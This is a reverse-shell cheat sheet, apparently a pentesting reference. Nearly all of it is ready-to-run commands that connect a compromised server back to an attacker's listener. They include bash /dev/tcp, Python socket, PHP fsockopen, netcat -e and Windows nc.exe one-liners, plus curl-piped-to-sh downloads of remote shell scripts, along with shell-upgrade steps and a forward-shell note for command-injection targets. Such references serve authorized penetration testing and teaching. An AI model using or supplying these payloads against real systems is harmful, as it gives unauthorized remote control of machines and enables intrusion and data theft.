Reverse-Shell

A list of Reverse Shells on multiple languages. Replace {IP} and {PORT} values with a couple IP:port the server can access. Then, on your local machine you open a listener with netcat:

On local machine

Listen with NetCat

To listen for an incoming connection and upgrade to a pty shell:

nc -lvnp {PORT}

# after the connection is established
python -c 'import pty; pty.spawn("/bin/bash")'

On macOS use the netcat from homebrew instead of the one provided by the OS

You can use rlwrap to use arrow keys.

Listen with PwnCat

pwncat is a netcat with advanced features.

pwncat -lv {PORT}

Upgrade the shell

Then, Ctrl-Z to suspend the connection and return to your own terminal. Type on your terminal:

stty raw -echo

The console should be black, next foreground the shell with:

fg
reset

On target host:

export SHELL=bash
export TERM=xterm-256color
stty rows 24 columns 80

Now you should have a complete shell with shortcuts available.

On the remote server

Windows

Upload nc.exe on the remote server then use the command (same as NetCat):

cmd.exe /C "nc.exe {IP} {PORT} -e cmd.exe"

PowerShell

This is explain in the Windows / Download and execute script section.

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{IP}",{PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bash

bash -i >& /dev/tcp/{IP}/{PORT} 0>&1

To use the bash's built-in /dev/tcp device file the use must use /bin/bash as shell. Often it uses sh or dash, then you can use bash -c "<cmd>" to force the bash

Netcat

nc -e /bin/sh {IP} {PORT}

Java

r = Runtime.getRuntime();p = r.exec(["your payload"] as String[]);p.waitFor()
String[] cmd={"cmd","/C","<cmd>"};Runtime.getRuntime().exec(cmd);

This payload can also work with BeanShell scripts.

PHP

php -r '\$sock=fsockopen(\"{IP}\",{PORT});exec(\"/bin/sh -i <&3 >&3 2>&3\");'

Reverse Shell as a Service

This website generates a bash script with multiple reverse shell. It detects available tools and runs with the correct payload.

curl https://resh.now.sh/{IP}:{PORT} | sh

You can also copy the script locally and expose to the server using a Python HTTP server:

# On your machine
cd www
curl https://resh.now.sh/{IP}:{PORT} > x
python -m http.server

# On the remote machine
curl http://{IP}/x | sh

Forward shell

If the remote server cannot contact your local machine, it's still possible to use a shell that accept commands from named pipes using mkfifo and send the output to a file.

IppSec has a repository on Github with a simple but effective script to demonstrate the technique on a vulnerable web server: forward-shell. You need to set the vulnerable url (self.url = r"http://'...) and the exploit arguments (headers = {'User-Agent': payload}). Remember that you can use the same technique on other services that allow you to inject commands.